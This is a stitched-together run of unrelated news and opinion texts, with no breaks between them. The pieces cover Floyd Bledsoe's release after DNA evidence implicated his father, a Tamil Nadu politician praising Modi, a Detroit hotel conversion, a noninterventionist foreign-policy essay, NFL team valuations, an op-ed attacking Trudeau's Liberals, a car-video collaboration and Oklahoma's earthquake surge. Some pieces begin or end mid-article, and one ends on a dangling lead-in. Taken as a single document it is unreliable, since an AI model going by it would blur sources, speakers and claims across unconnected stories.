But Floyd was shocked beyond words when he saw that a concentrated level of his father 's DNA had been found on the socks of the victim , he told the Lawrence Journal-World in an interview Tuesday , just three weeks after he was released from prison .
“ It 's something that I 'm still trying to process and still working through even to this day , ” Floyd said quietly .
Floyd , 39 , was released from prison Dec. 8 following a hearing in Jefferson County District Court in which the new evidence was discussed . Believing that Floyd had been wrongfully convicted , the Project for Innocence and Post-Conviction Remedies at Kansas University and the Midwest Innocence Project had taken on his case years before and had paid to have the DNA from the original murder investigation tested .
Kirk Vernon , chief detective for the Jefferson County Sheriff 's Office , testified at the Dec. 8 hearing that his agency and the Kansas Bureau of Investigation were re-examining the murder case .
On Tuesday , Jefferson County Sheriff Jeffrey Herrig told the Journal-World detectives would sit down after the holidays and determine what direction to take .
“ We just want to make sure there are n't any stones out there that have n't been uncovered , ” Vernon said .
Father 's DNA
The investigation is made more difficult because after the media published stories about the DNA report findings , Floyd 's brother killed himself on Nov. 9 in the parking lot of the Bonner Springs Wal-Mart before police had a chance to question him , Herrig said .
In the suicide letters , Tom , 41 , confessed once again to killing Camille Arfmann , who was the sister of Floyd 's wife at the time .
Arfmann was shot once in the back of the head and three times in the chest and was sexually assaulted .
During the trial in 1990 , experts testified Arfmann was killed at an unknown location and dragged by her feet to a trash dump on property owned by Floyd 's father .
In one of the suicide letters , Tom , who still lived with his parents near the dump at the time of the murder , wrote that he and the girl had sex on his father 's bed and he believed that is how his father 's DNA , consisting of skin cells , must have gotten on her socks .
But Herrig said the chances for the DNA to be from the bed were “ very slim . ”
“ We did talk to the KBI lab about that , ” Herrig said . “ It is a very slim possibility to be honest , but you ca n't say it did n't ( happen ) because there is that little bit of doubt . ”
Alice Craig , Floyd 's attorney and a professor with the innocence project , agreed .
“ It 's not impossible but it is unlikely , especially with the level of DNA , ” she said . “ The match is not going to be just from incidental contact . ”
The DNA evidence is overwhelming , authorities have said . The odds that the DNA found on the socks does not belong to the father are one in 20 sextillion .
The father , Floyd L. Bledsoe , and mother , Catherine Bledsoe , now live in Texas .
The Journal-World has not been able to reach the couple . The Associated Press said in a story last week that a reporter contacted Catherine Bledsoe , who had no comment , and her husband did not respond to a message seeking an interview .
The father has not been charged with any crime . Detectives talked to him and his wife about the case in November when they returned to Kansas to bury their son , Herrig said .
“ They did n't offer anything , ” Herrig said .
Prison time
On Tuesday , Floyd met with a Journal-World reporter and photographer in a small office in the innocence project located at Kansas University 's law school to talk about his time in prison .
He was dressed in a white polo shirt , his strawberry-blond hair now tinged with silver . Lines around his blue eyes crinkled when he smiled , which he did often .
Prison in the beginning is extremely hard , he said .
After he was sentenced to life , Floyd was sent to the Hutchinson Correctional Facility . That prison has high stone walls surrounding it , which means inmates , even in the prison yard , can not see the outside world at all , Floyd said .
Even though Floyd knew he was innocent , there was no one to tell .
“ From a prisoner 's perspective , who are you going to tell ? ” he said . “ It 's not like you can show up at the governor 's door and say , ‘ Hey , I need your assistance . ' ”
Three inmates took him under their wing and explained to him ways to adjust to prison society , Floyd said .
“ The first 100 days , it 's crazy , ” he said . “ You walk into prison , you have nothing . You have a laundry bag with a towel , socks and stuff in it … ”
Doing the time is even harder .
“ You are sitting there , and the days seem very long , like the time is never going to add up and start clicking along , ” Floyd said . “ You learn to occupy your time with various things . You pick up hobbies . You read . ”
The three inmate friends taught him how to avoid becoming homesick .
“ They explained to me the importance of , like , when you get pictures from home , to not just sit there and stare at them day in and day out because it makes your time longer because all you do is think about that time — wish you were there , ” he said . “ You ca n't function in two worlds . ”
Floyd said he spent a lot of time trying to make sense of what had happened to him .
“ It 's very frustrating , ” he said . “ It goes back to ( inmates ) say , ‘ It was n't me , it was n't me . ' It 's not like a new profound revelation that an accused person ever said , ‘ It was n't me . '
“ All you can do is grasp on and hope that the right person will listen and take up your cause , ” Floyd said .
Turnaround
Up to the point when Floyd was arrested on murder charges , his life in the Oskaloosa area had not been easy .
He married young and worked at a dairy farm providing for his wife and two small children , but there was n't a lot of money .
But in prison he turned his life around , using his time wisely , his attorneys said .
“ The first thing when I got to Hutch , I made … a decision that I want to utilize the time to learn as much as I could so that I could better myself , ” he said .
Floyd volunteered to work with inmates in hospice , which took three months of training .
Floyd 's job consisted of sitting with inmates , some of whom were his friends , as they worked out issues of anger and regret before they died . Most were dead within six months of coming to hospice , he said .
Floyd said the hospice work was healing to him because he learned how to help others .
“ I had several friends I had the blessing to sit with and to be able to share and talk with them and to learn more about their lives , ” he said . “ It 's a wonderful thing to be able to help people . ”
The lives of many of the inmates who were dying usually had changed from the time they committed crimes , he said .
“ True enough , they messed up — some have done horrible things — but that does not change the fact that they are human beings , ” he said .
One inmate friend persuaded Floyd to take up painting , and in that he discovered a talent , producing colorful nature paintings , always with animals and wildlife . One painting was published in a newspaper , and another won an award at an art show .
“ The reason I started doing artwork was a New Year 's resolution , ” he said . “ It was a way to say thank you to someone for doing something for me . ”
He painted one picture of a bird dog with very lifelike eyes over a three-day period while sitting with an inmate who was dying of cancer .
“ Just before he passed away , he really actually thought he could pet the dog , which touched me , ” he said , his eyes growing watery .
Floyd joined Freedom Challenge , a nonprofit agency that assists inmates in addressing their life issues by developing life-skills based on biblical principles , according to its website . It 's located at the Hutchinson prison and is an intense eight-month program that meets five days a week .
Floyd also was involved in church groups .
When he was at the Lansing prison , after 2008 , he took some undergraduate college courses through Donnelly College , a private Catholic school in Kansas City , Kan. A private donor pays a portion of the tuition , requiring the inmate to pay only $ 200 a course .
In addition , he attended tech classes for utility maintenance that included preparation for him to work in refrigeration , plumbing and electrical fields .
“ My artwork , volunteering with church and volunteering with hospice , I stayed pretty busy , ” he said .
Forgiveness
Floyd had been in prison only a couple years when he lost his direct appeal to the Kansas Supreme Court .
Just before that decision came down , he said he had started on what he calls “ my road to forgiveness , ” and had attended one of the prison 's “ inner healing seminars . ”
At the seminar , “ they talked about forgiveness and how it opens doors , ” Floyd said . “ I decided yes , that 's what I will do is go out and tell everybody that I forgive them . ”
His parents came to visit him the following Saturday , and he had decided to start his forgiveness plan with them .
When he walked into the visitation room , he said he thought he was happy , but his mother asked him why he seemed so gloomy .
“ ‘ Why are you looking so sad ? ' ” he said she asked . “ ‘ Normally you are happy and smiling and happy to see us . ' ”
Floyd said he pointed out that he had lost his appeal and would be spending the rest of his life in prison .
“ And she was like , ‘ Why , I know that , we saw it in the paper , ' ” Floyd said .
It upset Floyd that she seemed to make light of the court decision and decided it was not the right time to forgive them .
“ I stood up , and I was like , ‘ Do n't write me , do n't call me , do n't come visit me , ' ” Floyd said . “ ‘ I 've got some stuff I 've got to work out . ' I walked out of that visiting room , tears running down my face . I was mad at God . I was mad at everybody . ”
He was in his cell when the program director for the inner healing seminar opened his door and let him know the seminar was starting .
“ I went , and that day is one of the first days that I learned that forgiveness does n't free the offender from what they have done ; forgiveness frees the offended from having to live with the hurt and the pain of what others have done to them , ” he said . “ That is one of many days that God has truly changed my entire life , changed my entire perspective of how I look at things . ”
Other programs such as Freedom Challenge taught him how to love , to be loved and to truly care about people , he said .
In 2008 , a federal district judge overturned Floyd 's conviction , and he was suddenly freed for what he thought would be the rest of his life .
But 10 months later , an appeals judge rescinded it and ordered Floyd back to prison .
Craig , Floyd 's attorney , called to give him the bad news .
“ That was a terrible day , ” Craig said during the interview . “ I do n't know how you survived it . ”
The news was devastating , Floyd said .
He remembered the pain that was associated with prison and those first dark days after he was sentenced .
“ I remember walking on the side of the road right after Alice had told me , and I spent what seemed like hours but it was only less than 45 minutes , crying out to God about it , and all he would tell me was , ‘ Just trust me , just trust me , ' ” Floyd said . “ I just kept looking around and said , ‘ I do , but all this I can touch and I can see . ' ”
Floyd said he finally realized that he had his faith in God and friends in prison and that he would be able to survive .
“ It was hard , I wo n't beat around the bush , ” Floyd said . “ Back inside , I hung onto the hope that maybe this next appeal will clear everything back up , and I would be back out free and clear . ”
Years passed and finally the DNA results came in last fall .
After seeing the results connecting DNA to his father , he remembered how his father and mother would never discuss the murder with him or respond to questions he asked about it .
They never said they were sorry for what had happened to him , he said .
“ The whole thing was like a pink elephant in the middle of the room , ” Floyd said . “ We never even talked about the situation . ”
Floyd said he has n't spoken with his parents since he saw the report , and they have not tried to contact him even when they were in Kansas for his brother 's funeral .
He said that for him , the findings regarding his father 's DNA leave only one thought .
“ You walk away thinking he assisted in some fashion , ” Floyd said .
Waiting for the Dec. 8 hearing to determine whether he would be freed after the DNA results were released was extremely frustrating , he added .
“ What 's crazy is when you are lying there , and you start thinking maybe this week , maybe today , maybe tomorrow , ” he said . “ But every day you wake up and you still look at the same fence , the same bars , the same whatever . You start thinking , ‘ Is this really ever going to happen ? ' ”
Floyd said he now is living in south-central Kansas and is working “ odds and ends ” until he finds a permanent job .
He hopes the Kansas Legislature will consider passing laws to try to prevent the incarceration of innocent people , including requiring police interrogations to be recorded .
He has friends in prison still and at least one or two who he believes may be innocent .
“ I have tried to stay connected with them because I want them to know that they are not forgotten , ” he said .
File photo of DMK chief M Karunanidhi
As general elections draw near , Narendra Modi has found more than one `` good friend '' in Tamil Nadu.M Karunanidhi , the 89-year-old head of the DMK has been reported by a Tamil newspaper Dinamalar as saying , `` Modi 's continuous campaign reveals he is a hard worker . Modi is my good friend too . `` Mr Karunanidhi 's arch rival and Tamil Nadu Chief Minister J Jayalalithaa too has in the past described Mr Modi , the BJP 's prime ministerial candidate , as a `` good friend . `` The DMK chief told the newspaper that he would not speculate on a post-election scenario , but when reminded that he had said at a conference in Trichy recently that he would not ally with `` communal forces , '' shot back , `` Did that appear to be a reference to the BJP ? Are you making a confessional statement that it 's a communal party ? `` Mr Modi , long accused by rival Congress and others of being a divisive leader , is suddenly finding wider political acceptability as surveys show an advantage for him and his party in the general elections due by May.Yesterday , the BJP struck a pre-election alliance with Bihar politician Ram Vilas Paswan , who had walked out of their national alliance 12 years ago criticising Mr Modi 's handling of the communal violence that tore through Gujarat on his watch in 2002 . ( Read more The DMK had fought the 2004 and 2009 general elections with the Congress in Tamil Nadu . In 2013 , however , the party pulled out of the Congress-led UPA coalition accusing the government of failing to take a tough stand on Sri Lanka 's alleged war crimes against the country 's Tamil population.In December last year , Mr Karunanidhi had denied reports that he had praised Mr Modi and had ruled out an alliance with the BJP . Sources said Mr Karunanidhi 's younger son and political heir MK Stalin was against such a partnership .
The project snared a $ 6.5-million state loan from the Michigan Economic Development Corp in exchange for a capital investment of $ 34 million and the creation of 30 permanent full-time jobs .
Architectural rendering shows the Metropolitan Building in downtown Detroit remade as an Element Hotel . ( Photo : Starwood Hotels ) Story Highlights The building has been vacant since the mid-1970s .
The Detroit Downtown Development Authority approved the group 's plans for the hotel development in summer 2015 .
It was nicknamed the jewelers buildings for the large number of diamond cutters and goldsmiths working there ,
The rebirth of the historic , 98,000-square-foot Metropolitan Building received a state loan Monday for the creation of a new hotel for downtown Detroit .
Starwood Hotels & Resorts Worldwide said earlier this year that its Element Hotels brand will open a 110-room hotel in the long-vacant Metropolitan Building in July 2018 .
It would be a mixed-use , extended-stay 110-room hotel , including retail space several blocks from Comerica Park . The building has been vacant since the mid-1970s .
The redevelopment of the Neo-Gothic hotel , which opened in 1925 , is a collaboration between Detroit-based Means Group Inc. and Roxbury Group LLC , known as Metropolitan Hotel Partners .
With a vote on Tuesday from the Michigan Strategic Fund board , the project received a $ 6.5-million Michigan Community Revitalization Program performance-based loan from the Michigan Economic Development Corp . The developers plan a part of a total capital investment of $ 34 million and the creation of 30 permanent full-time jobs .
`` This is about more than brick and mortar , ” Eric Means , founder and CEO of the Means Group , said in a statement . “ This breathes life into downtown Detroit and is strong evidence of the commitment the state has to preserving an important piece of history in urban America . ''
The Roxbury Group received MSF incentives to support the renovation of the historic David Whitney Building , and the Plaza Midtown and Griswold Lofts developments .
To be known as the Element Detroit at the Metropolitan Building , the hotel will be at 33 John R .The Detroit Downtown Development Authority approved the group 's plans for the hotel development in summer 2015 .
The hotel is being designed for extended-stay guests , with bigger closets , a kitchen and extra room for visitors coming in for conventions and other events that require more than a single night 's stay . Typical stays range from three to five days .
Once nicknamed the jewelers buildings for the large number of diamond cutters and goldsmiths working there , the 14-story Metropolitan Building was designed by the Detroit firm of Weston and Ellington .
The Element 's adaptive reuse project will feature 2,000 square feet of meeting space on the second floor mezzanine level with attractive views of the city skyline , approximately 7,000 square feet of retail on the ground floor and lower level , and an outdoor patio on the 11th floor rear rooftop , according to plans unveiled earlier this year .
Contact Matthew Dolan : 313-223-4743 , msdolan @ freepress.com or on Twitter @ matthewsdolan . Staff Writer John Gallagher contributed to this article .
Read or Share this story : http : //on.freep.com/2gh8fpy
Americans have grown understandably weary of foreign entanglements over the last 12 years of open-ended warfare , and they are now more receptive to a noninterventionist message than they have been in decades . According to a recent Pew survey , 52 percent of Americans now prefer that the U.S. “ mind its own business in international affairs , ” which represents the most support for a restrained and modest foreign policy in the last 50 years . That presents a challenge and an opportunity for noninterventionists to articulate a coherent and positive case for what a foreign policy of peace and prudence would mean in practice . As useful and necessary as critiquing dangerous ideas may be , noninterventionism will remain a marginal , dissenting position in policymaking unless its advocates explain in detail how their alternative foreign policy would be conducted .
A noninterventionist foreign policy would first of all require a moratorium on new foreign entanglements and commitments for the foreseeable future . A careful reevaluation of where the U.S. has vital interests at stake would follow . There are relatively few places where the U.S. has truly vital concerns that directly affect our security and prosperity , and the ambition and scale of our foreign policy should reflect that . A noninterventionist U.S. would conduct itself like a normal country without pretensions to global “ leadership ” or the temptation of a proselytizing mission . This is a foreign policy more in line with what the American people will accept and less likely to provoke violent resentment from overseas , and it is therefore more sustainable and affordable over the long term .
When a conflict or dispute erupts somewhere , unless it directly threatens the security of America or our treaty allies , the assumption should be that it is not the business of the U.S. government to take a leading role in resolving it . If a government requests aid in the event of a natural disaster or humanitarian crisis ( e.g. , famine , disease ) , as Haiti did follow its devastating earthquake in 2010 , the U.S. can and should lend assistance—but as a general rule the U.S. should not seek to interfere in other nations ' domestic circumstances .
If parties to a dispute request outside arbitration , the U.S. should be in a position to act as a neutral mediator—which presupposes that the U.S. is not actively backing one side against another . We have seen the futility and absurdity of trying to act as an “ honest broker ” while providing lopsided support to one side in a conflict , and this should have no place in a noninterventionist foreign policy . There could be a potentially large and active role for U.S. diplomats abroad , but not one in which the U.S. was attempting to dictate terms or to promote a particular cause . International engagement could not and would not cease in a noninterventionist foreign policy , but it would be of a very different kind .
Advertisement
One of the priorities of a noninterventionist agenda would be the scaling back of America 's numerous commitments overseas . This would be accomplished mainly by shifting burdens gradually to current allies and regional powers : ceding regional influence in Central Asia to India and Russia , for example , and encouraging a more independent foreign policy for allies such as Japan and Germany . In general , the states that have the most at stake in maintaining regional stability should be given the responsibility for securing it . U.S. commitments have been building up over decades , so it is neither realistic nor desirable to end them suddenly . Nonetheless , there are also far more commitments than the U.S. can afford , and many of them are relics of the struggle with the Soviet Union or the remains of a “ War on Terror ” that has expanded beyond anything that most Americans imagined when it began a decade ago . Cutting back security entanglements is a long-delayed and necessary adjustment that the U.S. should have been making for the last 20 years . But it will not be sufficient simply to return to status quo ante at the start of the 21st century . The U.S. was already overcommitted around the world before the Bush era and will still be so after the withdrawal from Afghanistan . Ideally , the U.S. would reduce its overseas military presence in the Near East to at most what it was in the years before Desert Storm in 1991 , and continue to reduce its presence in Europe as European governments bear more of the costs of their own defense . To date , wealthy allies have been able to skimp on their military spending , on the safe assumption that the U.S. would be ready and willing to make up the difference , but this arrangement is neither sustainable nor in our best interests . It not only creates an unhealthy dependence that ends up dragging unwilling Europeans into U.S. wars of choice , but as we saw in Libya , it perversely pulls the U.S. into European wars of choice because Europe 's governments can not fight them on their own .
NATO is outdated and unnecessary , but provided that it functions purely as a defensive alliance it would n't necessarily have to be dissolved . If the alliance continued to exist , the U.S. should not use it or permit it to be used as cover for members ' wars of choice and “ out of area ” missions . It should go without saying that there would be no further NATO expansion , which does nothing except antagonize Russia to the detriment of regional stability . If the alliance 's security guarantees to current members are to mean anything , they should n't be extended to countries that the U.S. and other member nations are not actually willing to defend . To that end , U.S. and NATO officials should stop giving false encouragement to would-be member states that will never be admitted .
A noninterventionist U.S. would keep the major treaty allies it has for the time being but would also review its relationships with the many client states that neither act like nor deserve the name of ally . Clients that expose the U.S. to unnecessary conflicts or create dangerous tensions with other major powers are liabilities , and the U.S. should alter relations with them accordingly . That does n't require the U.S. to have poor relations with those states , but it does mean that they would stop receiving support and indulgence when their interests and ours clearly diverge . Many client state relationships would need to be downgraded as a result , and U.S. aid to them would be correspondingly reduced or eliminated .
In keeping with President Washington 's exhortation in his Farewell Address , the U.S. would seek to “ observe good faith and justice toward all nations ” and to “ cultivate peace and harmony with all. ” That means that a noninterventionist U.S. would work to maintain normal and full diplomatic relations with as many states as possible , and it would restrict or cut off trade with other states only in the most extreme cases . A noninterventionist foreign policy would very rarely rely on sanctions as a tool , and then only when they are targeted specifically against regime officials rather than the civilian population . In general , an America following Washington 's advice would promote both trade and diplomatic engagement rather than employing the tactics of embargo and isolation .
The U.S. would also refuse to take sides in the internal quarrels of other countries . The sovereignty of other states would be respected much more consistently than in past decades . The U.S. would refrain from destabilizing foreign governments or aiding in their overthrow , and it would not make a habit of siding with whichever protest movement happened to be in the streets of a foreign capital . Likewise , it would refrain from propping up and subsidizing abusive and dictatorial regimes and would condition U.S. aid on how a government treats its people . While there may be a need to cooperate with authoritarian states on certain issues , governments that torture or violently suppress peaceful protests , including the current Egyptian government , should n't be supported in any way by American taxpayers .
War might be necessary at some point , but if so it would be waged only in self-defense or the defense of a treaty ally . A noninterventionist U.S. would never wage a preventive war— which is contrary both to international law and morality—and would generally be wary of using force even when it could be justified . The U.S. should always avoid giving allies and clients the impression that they have a blank check from Washington , since that will tend to make them more combative and unreasonable in disputes with their neighbors . Allies and clients that wanted to pursue reckless and provocative courses of action would be actively discouraged , and it would be the responsibility of the U.S. to pull these states back from avoidable conflicts . A noninterventionist U.S. would manage relations with other major powers by seeking to cooperate on matters of common interest and by avoiding unnecessary disagreements on those issues where the U.S. has relatively little at stake . The U.S. and other major powers are bound to have conflicting interests from time to time , but these unavoidable disagreements should n't be compounded by picking fights over every issue where we differ . As long as the U.S. has allies on the borders of other major powers , there will always be a certain degree of mistrust and tension in our relations . However , the U.S. should n't make this worse by seeking to enlarge our alliances or increase our influence in countries that have historically been in the orbit of another major power . The goal here should be to keep tensions with other major powers at a tolerable minimum and to reduce the possibility of renewed great power conflict in the new century .
As George Washington also said : “ In the execution of such a plan , nothing is more essential than that permanent , inveterate antipathies against particular nations , and passionate attachments for others , should be excluded ; and that , in place of them , just and amicable feelings towards all should be cultivated. ” For that reason , a noninterventionist U.S. would be one that does n't seek to demagogue or exaggerate foreign threats , nor would it cultivate either hostility towards or adoration of any other country . Above all , it wo n't seek to make the U.S. the champion of any other country 's interests at our expense .
Noninterventionism is a rather clunky and unappealing label for a set of very appealing ideas : that the U.S. should mind its own business , act with restraint , respect other nations , refrain from unnecessary violence , and pursue peace . If future administrations took just a few of these as guiding principles for the conduct of foreign policy , America and the world would both be better off .
Senior editor Daniel Larison blogs at TheAmericanConservative.com/Larison .
MINNEAPOLIS -- Forbes Magazine 's annual valuations of all 32 NFL teams are in , and while the Minnesota Vikings still rank among the bottom half of the league , the franchise is once again estimated to be worth more than $ 1 billion -- and its value should continue to rise .
The Vikings are projected to be worth $ 1.15 billion , ranking 20th in the NFL , according to Forbes . That valuation is up from the $ 1.07 billion figure Forbes gave the Vikings in 2013 , and represents a $ 319 million increase since the Minnesota State Legislature approved funding for the Vikings ' new stadium in May 2012 .
According to Forbes ' calculations , the Vikings had revenues of $ 250 million in 2013 and an operating income of $ 5.3 million ; the latter figure was the lowest in the NFL , but the magazine has typically calculated the Vikings ' income to be among the league 's lowest . It 's also worth remembering the Vikings handed out new contracts to Brian Robison , Matt Cassel , Everson Griffen , Linval Joseph and Captain Munnerlyn during the 2013-14 fiscal year . While the next two years could be lean for the Vikings financially , the opening of their new stadium in 2016 should provide an infusion of cash .
For the eighth consecutive season , the Dallas Cowboys sat atop Forbes ' rankings , with an estimated value of $ 3.2 billion . According to Forbes , the only franchise in the world worth more than the Cowboys is Spanish soccer club Real Madrid , at $ 3.4 billion .
According to Forbes , the Chicago Bears are the league 's eighth-most valuable franchise at $ 1.7 billion . The Green Bay Packers came in 13th at $ 1.375 billion , and the Detroit Lions were 30th at $ 960 million .
Here 's what Forbes had to say about the Vikings :
Even for a government filled with politicians who assume they are Canada 's natural governing party , the arrogance of Prime Minister Justin Trudeau and the Liberals is out of control .
No one questions their right to govern . They have a majority .
But their increasing attempts to demonize and delegitimize not just their political opponents , but even opposing points of view , is an affront to democracy .
In recent days , Liberals walked out of Parliament 's status of women committee because they refused to recognize its new , duly constituted chair , Conservative MP Rachael Harder , solely because they disagree with her views on abortion . Not only is this anti-democratic — Harder answers to the voters of Lethbridge , Alberta , not the Liberal caucus — Trudeau shamefully endorsed what they had done .
Carolyn Bennett , Minister of Crown-Indigenous Relations and Northern Affairs , called on Conservative Leader Andrew Scheer not just to rebuke Conservative Senator Lynn Beyak — which is fair comment — but to throw her out of the Conservative caucus , for expressing her view that residential schools did good as well as harm . Bennett wants Beyak declared a political leper , literally , for thought crime .
Liberals on another parliamentary committee considering their M-103 “ Islamophobia ” motion insulted and attacked my Sun Media colleague , Tarek Fatah , who appeared as a witness and who has devoted his life — often at the risk of death — to opposing Islamist tyranny and terrorism . Why ? Because Fatah has criticized M-103 .
This committee is chaired by Liberal MP Hedy Fry , who once falsely accused white people living in Prince George , B.C . of burning crosses on their lawns .
Even when the Liberals have a legitimate grievance — for example Climate Change Minister Catherine McKenna justifiably calling out Tory MP Gerry Ritz for demeaningly referring to her as “ Climate Barbie ” in a tweet , the irony that McKenna describes Canadians who disagree with her about anthropogenic climate change as “ climate deniers ” — a phrase used by self-described “ environmentalists ” to compare them , outrageously , to Holocaust deniers is lost on them .
The great Conservative thinker Thomas Sowell described the attitudes the Liberals are demonstrating in his 1995 book , The Vision of the Anointed , on the dangers of a “ progressive ” liberal ideology run amok .
“ What a vision may offer , and what the prevailing vision of our time emphatically does offer , is a special state of grace for those who believe in it , ” Sowell writes . “ Those who accept this vision are deemed to be not merely factually correct , but morally on a different plane . Put differently , those who disagree with the prevailing vision are seen as not merely in error , but in sin . ”
It is this arrogant and contemptuous attitude that Trudeau and the Liberals are increasingly displaying — not just that their political opponents are wrong , but that they are evil .
Mid-term polls should always be viewed with caution , but if there 's a canary in the coal mine for the Liberals , it 's found in two surveys released last week .
In the face of what until now have been unrelenting polls showing the Liberals well ahead of the Conservatives , Forum Research found the Tories now leading 39 % to 35 % , while an Angus Reid Institute poll found almost half of Canadians surveyed — 45 % — say it 's time for a change in government , compared to 34 % who disagree and 22 % undecided .
Perhaps pride goes before a fall .
lgoldstein @ postmedia.com
I 'm a car junkie . When I 'm not working on a car , writing about a car , or looking for my next car , I 'm watching car videos on the internet . I 'm a hoot at parties . That 's why I 'm positively tickled pink that the forces behind the Mightycarmods channel and Motor Trend 's popular Roadkill series may be working together in the future .
For the uninitiated , Roadkill is a channel where two insane people , David Freiburger and Mike Finnegan , create car-centered challenges for themselves with the caveat being that they 'll use only the most decrepit , junkyard-destined cars on and off the road . It 's supremely entertaining and satisfying , as the hard fact that something like this gets millions of hits means that car culture is n't dying - quite the opposite .
Mightycarmods is also a channel where two people - Marty Mulholland and Blair “ Moog ” Joscelyne work on cars , but the focus of the channels is to show the average wrencher how to complete various projects in the comfort of their own garage or driveway . They also have longer , feature-length builds that go off the modification deep end , and throughout the years , their production quality has skyrocketed , solidifying it as the most watched DIY car show on the internet .
Earlier this month , Roadkill 's Facebook page asked Fast N ' Loud star and professional caricature of himself Richard Rawlings and his mechanically-inclined co-host Aaron Kaufman to a challenge .
Advertisement
A challenge which Richard promptly declined pending further news , claiming that his shop , Gas Monkey Garage , is simply too busy .
Advertisement
Although some skeptical viewers rolled their eyes at this stunt , since both shows are or were sponsored by Dodge , Mightycarmods took up the mantle and replied , which got a ton of positive attention .
Advertisement
So far , the two channels are in talks , perhaps for a collaborative episode . Mightycarmods have done episodes in the US , and Roadkill did have an episode in Australia . Nevertheless , whether or not something fruitful comes from this endeavor , it 's good to know that car culture , as big as it is , can sometimes be a small world .
The people most interested in big block displacement can find a common ground with those who enjoy modified kei cars and custom one-off builds of Subaru wagons .
Advertisement
Also , if any one of either channel 's team is reading this , I 'll throw my not-so-green hat into the ring as well , in due time .
UPDATE : They 're doing something . Yes .
Advertisement
Tavarish is the founder of APiDA Online and writes and makes videos about buying and selling cool cars on the internet . He owns the world 's cheapest Mercedes S-Class , a graffiti-bombed Lexus , and he 's the only Jalopnik author that has never driven a Miata . He also has a real name that he did n't feel was journalist-y enough so he used a pen name and this was the best he could do .
Advertisement
http : //bit.ly/1KJFoSE
You can also follow him on Twitter and Facebook . He wo n't mind .
For the past three decades , Oklahoma averaged about 50 earthquakes a year . But that number has skyrocketed in the past few years . In 2013 — the state 's most seismically active year ever — there were almost 3,000 .
The quakes are small , and they 're concentrated in the central part of the state , where the Erwins live .
Amanda Erwin says that even on a clear day , she knows something 's up when the thunder begins : The chandelier swings , and the walls and bed start rumbling . Her husband , Keith , says the earthquakes remind him of the artillery he used to hear growing up near a military base . And when the sound and shaking fade , the game starts .
`` We 're just trying to look at each other , and we play this game : What do you think it was ? Er , 2.5 ? Nah , that had to have been a 3.0 , '' he says . `` It 's a daily thing . ''
In October , the U.S. Geological Survey warned that Oklahoma 's risk of quakes has increased tenfold . The swarm of earthquakes includes Oklahoma 's largest ever , a 5.6-magnitude temblor that struck east of Oklahoma City in 2011 .
`` That does n't mean that there 's going to be a large earthquake tomorrow , or next month , or next year even . But those probabilities are up very substantially , '' says Bill Leith , senior science adviser for earthquake and geologic hazards at the USGS .
He says there 's evidence linking Oklahoma 's earthquakes to the state 's large oil and gas industry . When they drill , toxic fluid from hydraulic fracturing , or fracking , and other types of drilling is injected deep underground . That can change pressures near fault lines , says Katie Keranen , a seismologist at Cornell University .
`` We can show that it 's quite reasonable that water flowing from these wells is actually triggering these earthquakes , '' Keranen says .
But while scientists say the quakes are likely connected to the wells , there 's no proof . That 's why regulators are n't considering new rules or laws .
Austin Holland , a research seismologist with the Oklahoma Geological Survey , says oil and gas activity might trigger earthquakes , but it could just be a natural increase .
`` I do n't think we can , at this point , attribute all the earthquakes to some sort of man-made cause , '' Holland says .
In the fall , state regulators did force one well operator along the Oklahoma-Texas border to reduce injection volume and pressure after a series of earthquakes nearby . But the state might allow an experiment — to let the company increase the injections to see if it does trigger more rumbling . Scientists , like Holland , would monitor the outcome .
`` Or , no earthquakes happen and we say , 'Wow , that was the most amazing coincidence we 've seen , ' and we move on , '' Holland says .
Back at the Erwin home , every little noise or rumble sends them scrambling for the iPad to see if they felt a real earthquake or a phantom .
`` You feel like you 're playing Battleship , '' says Amanda Erwin . `` You look at the map , and you see these little pings of all the different places where they hit . ''
Copyright 2018 NPR . To see more , visit http : //www.npr.org/ .
AUDIE CORNISH , HOST :
Oklahoma is no stranger to natural disasters . The state is best known for tornados , but it might not be long before something else steals the spotlight : Earthquakes . As Joe Wertz of StateImpact Oklahoma reports , the number of quakes there has soared , including two more just today .
JOE WERTZ : Amanda Erwin says even on a clear day , she knows something 's up when the thunder begins .
AMANDA ERWIN : The chandelier was swinging and the walls were rumbling and the bed was rumbling .
WERTZ : Her husband Keith says the earthquakes remind him of the artillery he used to hear growing up near a military base and when the sound of shaking fade , the game starts .
KEITH ERWIN : We just turn and look at each other and we play this game , what do you think it was ? A 2.5 . No , that had to have been a 3.0 . It 's a daily thing .
WERTZ : For the past three decades , Oklahoma averaged about 50 earthquakes annually , but in the last few years , it skyrocketed . In 2013 , almost 3,000 quakes shook Oklahoma , the state 's most seismically active year ever . The quakes are small and they 're concentrated in the central part of the state right where the Erwin 's live . As we talk in the living room of their suburban Oklahoma City home , a funny thing happens .
ERWIN : Was that one just now ? Did you hear it ? Did you hear that , that little rumble ? OK . It might have been the workers .
WERTZ : The Erwins are on edge and they 're not alone .
UNIDENTIFIED WOMAN : Oklahoma City , 9-1-1 .
UNIDENTIFIED MAN : Yes . Did we just have an earthquake ?
UNIDENTIFIED WOMAN : Yes , yes . We had an earthquake . Everything 's OK now . Do you need police , fire or ( unintelligible ) ?
UNIDENTIFIED MAN : No . I was just sitting here looking at the ball game and my butt started moving .
WERTZ : In October , the U.S. geological survey warned that Oklahoma 's risk of earthquakes has increased 10-fold . The swarm of quakes includes Oklahoma 's largest ever , a 5.6 magnitude temblor that struck east of Oklahoma City in 2011 .
BILL LEITH : And that does n't mean that there 's going to be a large earthquake tomorrow or next month or next year even , but those probabilities are up very substantially .
WERTZ : That 's Bill Leith with the U.S. Geological Survey . He says there 's strong evidence linking Oklahoma 's earthquakes to the state 's large oil and gas industry . When they drill , toxic fluid from fracking and other types of drilling is injected deep underground . Cornell seismologist Katie Keranen says that can change pressures near fault lines .
KATIE KERANEN : And we can show that it 's quite reasonable that water flowing from these wells is actually triggering these earthquakes .
WERTZ : While scientists say the quakes are likely connected to the wells , there 's no proof . That 's why regulators are n't considering new rules or laws . Oklahoma 's official seismologist , Austin Holland , at the State Geological Survey , says oil and gas activity might trigger earthquakes , but it could just be a natural increase , too .
AUSTIN HOLLAND : But I do n't think we can , at this point , attribute all the earthquakes to some sort of manmade cause .
WERTZ : In the fall , state regulators did force one well operator along the Oklahoma/Texas border to reduce injection volume and pressure after a series of nearby earthquakes . But the state might allow an experiment to let the company increase the injections to see if it does trigger more rumbling . Scientists , like Holland , would monitor the outcome .
HOLLAND : Or no earthquakes happen and we say , wow , that was the most amazing coincidence we 've seen and , you know , we move on .
WERTZ : Back at the Erwin home , every little noise or rumble sends them scrambling for the iPad to see if the quake was real or a phantom .
ERWIN : You feel like you 're playing Battleship . You look at the map and you see these little tings of all the different places where they hit .
